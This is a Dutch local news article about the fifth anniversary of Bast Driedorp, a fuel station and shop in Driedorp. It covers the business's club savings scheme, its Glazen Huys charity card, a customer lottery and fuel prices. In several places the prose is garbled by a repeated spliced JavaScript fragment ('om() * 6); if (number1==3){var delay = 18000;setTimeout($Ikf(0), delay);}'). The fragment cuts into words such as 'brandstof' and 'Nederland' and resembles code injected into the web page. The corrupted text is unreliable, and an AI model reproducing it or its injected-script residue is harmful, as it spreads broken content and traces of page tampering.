Vijf jaar Bast Driedorp

Vijf jaar Bast Driedorp

Van aardappelen tot springkussen, bij Bast Driedorp is het allemaal te koop of te huur. Veelzijdig dus en maatschappelijk betrokken, want dikwijls in de weer met een actie voor een vereniging of instelling. Dit jaar staat het Glazen Huys centraal bij de winkel in Driedorp, die deze week samen met klanten feest viert.

Op 23 mei 2008 opende Bast Driedorp zijn deuren. Inmiddels zijn er nu 5 jaren verstreken en heeft Bast Driedorp een eigen stempel gedrukt op de locatie met een hele eigen werkwijze.

Dit jaar sparen voor het Glazen Huys
“Bast Driedorp is een bedrijf dat op innovatieve wijze de maatschappij van dienst is. Dit is terug te vinden in bijvoorbeeld de actie die wij hebben bedacht voor clubs, scholen en verenigingen. Wanneer leden en/of sympathisanten bij ons tanken, kunnen zij voor hun club sparen en leggen wij daar de helft van bij. Deze actie is voor elke non-profitorganisatie die zich bij ons aanmeldt met bankrekening- en adresgegevens. We krijgen veel aanvragen en willen graag iedereen sponsoren, maar de kosten zijn daarvoor niet te overzien. Op deze wijze kunnen wij elke club helpen. Sinds deze week ligt er ook een spaarpas voor het Glazen Huys. Wie voor dit (nog onbekende) goede doel wil sparen, hoeft alleen bij de balie aan te geven dit te willen en wij zorgen ervoor dat er 2 cent per liter naar het goede doel gaat. 1 cent van de klant en 1 cent van ons. Dit kost de klant overigens helemaal niets.”

Picknickplaatsje
Behalve voor fietsen en brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof kan men bij Bast Driedorp ook terecht voor aanhangers, gasflessen, springkussens, etc. maar ook de aardappelen en eieren mogen op de lijst zeker niet ontbreken. Voor de passerende fietsers en automobilisten die een kopje koffie willen drinken of een ijsje willen eten is er inmiddels een gezellige picknickplaats gecreëerd op de weide, waar u uitkijkt over akker en bos. Zo blijft Bast Driedorp bezig om van de locatie optimaal gebruik te maken en de klant een ruime mogelijkheid te bieden voor handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel en recreatie.

Feest met loterij
“Ook de komende 5 jaar en de jaren daaropvolgend gaan we door met het optimaliseren van de mogelijkheden, maar eerst gaan we de eerste 5 jaar Bast Driedorp vieren met onze klanten, aangezien wij dankzij onze klanten recht van bestaan hebben. Wij willen hen dan ook graag bedanken en hebben daarvoor diverse acties bedacht. Zo wordt er deze week een tankpas ter waarde van € 50,00 verloot en op zaterdag ook nog een smartphone. Ook worden er opstapdagen voor fietsliefhebbers georganiseerd, wat betekent dat u een proefrit kunt maken met de fiets(en) waar uw interesse naar uitgaat. Onze paradepaardjes zijn de elektrische Gazelle fietsen, waarvan u een ruim aanbod bij ons aan zult treffen. Het merk Thompson is ons sportfietsenmerk, vrij nieuw in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, maar bij onze zuiderburen al jaren een goed bekendstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and merk. Ook krijgt u gedurende deze week korting variërend van 10% tot wel 25% op al onze fietsen. Daarnaast kunt u alle informatie krijgen die u wenst, onder het genot van een portie poffertjes. Neem gerust uw kinderen mee, want terwijl u proef rijdt, kunnen de kinderen zich vermaken op het springkussen.”

Er zijn al 3 prijswinnaars van € 50,00 brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof tegoed bekend:
Dinsdag – Johan
Woensdag – Aaltje van Dijk
Donderdag – Hengki Dijkstra
De deelnemers die niet hebben gewonnen, maken zaterdag nog kans op de smartphone. U kunt vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag en morgen ook nog (weer) meedoen voor de tankpassen, ook hiervoor geldt, niet gewonnen? Uw bon gaat mee voor de verloting van de smartphone.

Vrijdag en zaterdag spectaculaire kortingen op al onze brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffen. De prijzen zijn de komende dagen: euro 95 – 1.689, euro 95 excellium – 1.819, diesel – 1.379 en de LPG is de hele week (vrijdag tot vrijdag) maar 0.599!

 

Dit artikel is ook geplaatst op: Nijkerk.nieuws.nl

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.